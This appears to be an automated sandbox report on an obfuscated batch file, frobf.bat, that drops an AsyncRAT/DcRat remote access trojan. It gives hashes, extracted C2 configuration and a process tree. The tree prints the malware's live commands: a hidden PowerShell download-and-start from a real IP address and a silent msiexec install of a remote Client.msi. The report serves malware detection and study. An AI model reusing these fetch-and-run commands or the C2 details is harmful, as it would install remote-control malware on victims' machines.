Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 19:30
Static task
static1
Behavioral task
behavioral1
Sample
frobf.bat
Resource
win7-20240221-en
General
-
Target
frobf.bat
-
Size
17KB
-
MD5
389078feb0d26c841b905168deaecd15
-
SHA1
e0013a66fad26afbbac701c3fbd6a0d85ddce3c9
-
SHA256
f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193
-
SHA512
ce51959c6d29112e575350013be45f87907edb9dc2c6bc3c8dc566e251a350bc361380202c34874aef71085f745dbf4e4ae4a760f457f49ff5e36f238785d238
-
SSDEEP
192:oZYztAEqvAb5JqjbLoUfSY1PfcLCL6lh2uxHwNy/FDcTjNolW/uw6yfzyKe:oZY5AEqvA5JEoiJ1PfcL1PDwiMVvWKe
Malware Config
Extracted
http://103.179.189.111/porn.png
Extracted
asyncrat
1.0.7
Default
103.179.189.111:8848
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 4 2668 powershell.exe 6 3052 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 1 IoCs
Processes:
Client.exepid process 1704 Client.exe -
Loads dropped DLL 5 IoCs
Processes:
MsiExec.exepid process 1808 MsiExec.exe 1808 MsiExec.exe 1808 MsiExec.exe 1808 MsiExec.exe 1808 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Use of msiexec (install) with remote resource 1 IoCs
Processes:
msiexec.exepid process 2520 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe -
Drops file in Windows directory 6 IoCs
Processes:
EXPAND.EXEmsiexec.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setuperr.log EXPAND.EXE File opened for modification C:\Windows\Installer\MSI4808.tmp msiexec.exe File created C:\Windows\Installer\f764eed.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI4FA7.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log EXPAND.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
msiexec.exepid process 2520 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exemsiexec.exeClient.exepid process 2668 powershell.exe 3052 msiexec.exe 3052 msiexec.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe 1704 Client.exe -
Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes:
powershell.exemsiexec.exemsiexec.exeClient.exedescription pid process Token: SeDebugPrivilege 2668 powershell.exe Token: SeShutdownPrivilege 2520 msiexec.exe Token: SeIncreaseQuotaPrivilege 2520 msiexec.exe Token: SeRestorePrivilege 3052 msiexec.exe Token: SeTakeOwnershipPrivilege 3052 msiexec.exe Token: SeSecurityPrivilege 3052 msiexec.exe Token: SeCreateTokenPrivilege 2520 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 2520 msiexec.exe Token: SeLockMemoryPrivilege 2520 msiexec.exe Token: SeIncreaseQuotaPrivilege 2520 msiexec.exe Token: SeMachineAccountPrivilege 2520 msiexec.exe Token: SeTcbPrivilege 2520 msiexec.exe Token: SeSecurityPrivilege 2520 msiexec.exe Token: SeTakeOwnershipPrivilege 2520 msiexec.exe Token: SeLoadDriverPrivilege 2520 msiexec.exe Token: SeSystemProfilePrivilege 2520 msiexec.exe Token: SeSystemtimePrivilege 2520 msiexec.exe Token: SeProfSingleProcessPrivilege 2520 msiexec.exe Token: SeIncBasePriorityPrivilege 2520 msiexec.exe Token: SeCreatePagefilePrivilege 2520 msiexec.exe Token: SeCreatePermanentPrivilege 2520 msiexec.exe Token: SeBackupPrivilege 2520 msiexec.exe Token: SeRestorePrivilege 2520 msiexec.exe Token: SeShutdownPrivilege 2520 msiexec.exe Token: SeDebugPrivilege 2520 msiexec.exe Token: SeAuditPrivilege 2520 msiexec.exe Token: SeSystemEnvironmentPrivilege 2520 msiexec.exe Token: SeChangeNotifyPrivilege 2520 msiexec.exe Token: SeRemoteShutdownPrivilege 2520 msiexec.exe Token: SeUndockPrivilege 2520 msiexec.exe Token: SeSyncAgentPrivilege 2520 msiexec.exe Token: SeEnableDelegationPrivilege 2520 msiexec.exe Token: SeManageVolumePrivilege 2520 msiexec.exe Token: SeImpersonatePrivilege 2520 msiexec.exe Token: SeCreateGlobalPrivilege 2520 msiexec.exe Token: SeRestorePrivilege 3052 msiexec.exe Token: SeTakeOwnershipPrivilege 3052 msiexec.exe Token: SeRestorePrivilege 3052 msiexec.exe Token: SeTakeOwnershipPrivilege 3052 msiexec.exe Token: SeDebugPrivilege 1704 Client.exe -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
cmd.exemsiexec.exeMsiExec.exedescription pid process target process PID 1312 wrote to memory of 1992 1312 cmd.exe chcp.com PID 1312 wrote to memory of 1992 1312 cmd.exe chcp.com PID 1312 wrote to memory of 1992 1312 cmd.exe chcp.com PID 1312 wrote to memory of 1264 1312 cmd.exe cmd.exe PID 1312 wrote to memory of 1264 1312 cmd.exe cmd.exe PID 1312 wrote to memory of 1264 1312 cmd.exe cmd.exe PID 1312 wrote to memory of 2736 1312 cmd.exe find.exe PID 1312 wrote to memory of 2736 1312 cmd.exe find.exe PID 1312 wrote to memory of 2736 1312 cmd.exe find.exe PID 1312 wrote to memory of 2944 1312 cmd.exe find.exe PID 1312 wrote to memory of 2944 1312 cmd.exe find.exe PID 1312 wrote to memory of 2944 1312 cmd.exe find.exe PID 1312 wrote to memory of 1548 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 1548 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 1548 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2964 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2964 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2964 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2084 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2084 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2084 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2940 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2940 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2940 1312 cmd.exe findstr.exe PID 1312 wrote to memory of 2576 1312 cmd.exe cmd.exe PID 1312 wrote to memory of 2576 1312 cmd.exe cmd.exe PID 1312 wrote to memory of 2576 1312 cmd.exe cmd.exe PID 1312 wrote to memory of 2668 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 2668 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 2668 1312 cmd.exe powershell.exe PID 1312 wrote to memory of 2520 1312 cmd.exe msiexec.exe PID 1312 wrote to memory of 2520 1312 cmd.exe msiexec.exe PID 1312 wrote to memory of 2520 1312 cmd.exe msiexec.exe PID 1312 wrote to memory of 2520 1312 cmd.exe msiexec.exe PID 1312 wrote to memory of 2520 1312 cmd.exe msiexec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 3052 wrote to memory of 1808 3052 msiexec.exe MsiExec.exe PID 1808 wrote to memory of 344 1808 MsiExec.exe ICACLS.EXE PID 1808 wrote to memory of 344 1808 MsiExec.exe ICACLS.EXE PID 1808 wrote to memory of 344 1808 MsiExec.exe ICACLS.EXE PID 1808 wrote to memory of 344 1808 MsiExec.exe ICACLS.EXE PID 1808 wrote to memory of 2136 1808 MsiExec.exe EXPAND.EXE PID 1808 wrote to memory of 2136 1808 MsiExec.exe EXPAND.EXE PID 1808 wrote to memory of 2136 1808 MsiExec.exe EXPAND.EXE PID 1808 wrote to memory of 2136 1808 MsiExec.exe EXPAND.EXE PID 1808 wrote to memory of 1704 1808 MsiExec.exe Client.exe PID 1808 wrote to memory of 1704 1808 MsiExec.exe Client.exe PID 1808 wrote to memory of 1704 1808 MsiExec.exe Client.exe PID 1808 wrote to memory of 1704 1808 MsiExec.exe Client.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\frobf.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp.com 4372⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵
-
C:\Windows\system32\find.exefind2⤵
-
C:\Windows\system32\find.exefind2⤵
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\frobf.bat2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://103.179.189.111/porn.png', \"$env:TEMP\al.png\"); start \"$env:TEMP\al.png\"}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /quiet /i http://103.179.189.111/Client.msi2⤵
- Use of msiexec (install) with remote resource
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 24A0861BC118DF4972B652DC81AD17DB2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\ICACLS.EXE"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\." /SETINTEGRITYLEVEL (CI)(OI)HIGH3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\EXPAND.EXE"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files3⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe"C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files.cabFilesize
47KB
MD516ebf2cc73df381da5b897f52a78ee22
SHA1c2689939e1c957c30ef261f139057a973c618f47
SHA256b2f5fcf9b63c873170b0cf7680831251dcc38c703e42fb558bed2120bd15e156
SHA512cfb58afd9b6b6433dedc8e2364013845d8ca023025ac8a8fecd7930493abc80c5f4961ee279ea06d7658adb4e9f2893c9ece0af8b2ae278d1f99713255a3f683
-
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exeFilesize
47KB
MD5c69f098974248c79def70daf8b16bb8b
SHA1793c9cd72b635d731686db373b5136ff63cabc0a
SHA25693a0782c15f0c0049c85a07d09742805398aa6491b0b5a31d25603dc233c8f7d
SHA512d4d29f682cd42a3b494563929ae33356a386f2e9383010fdac8e95ce4c3e77100979d9040faeeb419eaecd82cee66a0521f2d50ee140ac7e0d7b25e77e2ae945
-
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\msiwrapper.iniFilesize
414B
MD5530d04e1cc099e920079dadd42fa9af5
SHA1be108fde55d06a979d885c63a5bcabce57993314
SHA256940ffdb2812a97de68423289c528be1747d5d04ed2a064087b60bdb77420ab14
SHA51281ed506a25ae6216995fbf02be4427ab2d6500987dd6537d8c92edf107586dad1b178ae13f56cc03a84af9de2927c21ab299d17a892fc34be3f37355ea532d95
-
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\msiwrapper.iniFilesize
1KB
MD521f69a6b8ea7d93f9284c77871d3c17a
SHA11a9c9b50fd66f38a729f4735ed6bc29192de5123
SHA2560518b7d7bce80897db79a85816a7ea57fd86bdd6fa5ff5bf7ae388d1013d043d
SHA51231d6f62447dcff0ae8e3505a2b387e7a54bcb74a21924becb2dc7eaa258e9173f790db821d3d80da60b0ea4569b870771b854b08efbd1ccb997eb5247ec6c13e
-
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\msiwrapper.iniFilesize
1KB
MD5cd560b89dc1658c1cc55081ac680b107
SHA1dfb29e554cb8530409e0e56dab08ea80cb07cdd6
SHA2565fff6ed1642a05967c6917df3cf2d5a1077e73e5f03403920b95f3cfae9d08d0
SHA51218a8bc48f334b97de382ebe3cc81934dde06c855207fa66029556bb16d7860fc92f8caab6cbba630c03efc1872a09eb3607596069d856ec7b1ed67e1658176e9
-
C:\Users\Admin\AppData\Local\Temp\tmpFilesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
C:\Windows\Installer\MSI4808.tmpFilesize
292KB
MD56bd9dac0f28211bda45fb0c569580e65
SHA1d2b53dbd29537d7844d17f60c3ca263740a7b8db
SHA256fecd40361bf0eccab0681d13c32136860ebf9b8d5cc96c4eda6a43af32abe079
SHA512c3f30f6bd2f2b60b65b3da0e96c1738dc859455cccb354b57d97ad8fe200bea71adf32b865903efac2bc2c8d833dd7d23956dfa7cf3dcefaec63ca47f6fd6ab1
-
C:\Windows\Installer\MSI4FA7.tmpFilesize
208KB
MD50c8921bbcc37c6efd34faf44cf3b0cb5
SHA1dcfa71246157edcd09eecaf9d4c5e360b24b3e49
SHA256fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1
SHA512ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108
-
memory/1704-85-0x00000000012F0000-0x0000000001302000-memory.dmpFilesize
72KB
-
memory/2668-12-0x000000001BD20000-0x000000001BD30000-memory.dmpFilesize
64KB
-
memory/2668-10-0x0000000002790000-0x0000000002798000-memory.dmpFilesize
32KB
-
memory/2668-9-0x000000001B630000-0x000000001B912000-memory.dmpFilesize
2.9MB
-
memory/2668-8-0x00000000027B0000-0x0000000002830000-memory.dmpFilesize
512KB